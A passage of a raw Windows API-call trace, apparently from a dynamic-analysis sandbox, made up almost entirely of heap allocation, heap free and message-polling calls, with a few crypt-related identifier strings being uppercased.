[0133.019] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.019] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0133.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0133.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0133.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0133.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0133.020] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0133.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0133.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0133.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0133.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0133.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.021] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0133.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0133.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0133.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0133.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0133.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0133.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0133.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0133.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0133.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0133.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0133.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0133.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0133.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0133.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0133.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0133.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0133.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.028] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0133.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0133.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0133.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.029] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0133.029] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.029] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0133.029] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.029] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.029] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0133.029] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0133.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.030] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0133.030] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0133.031] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0133.031] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 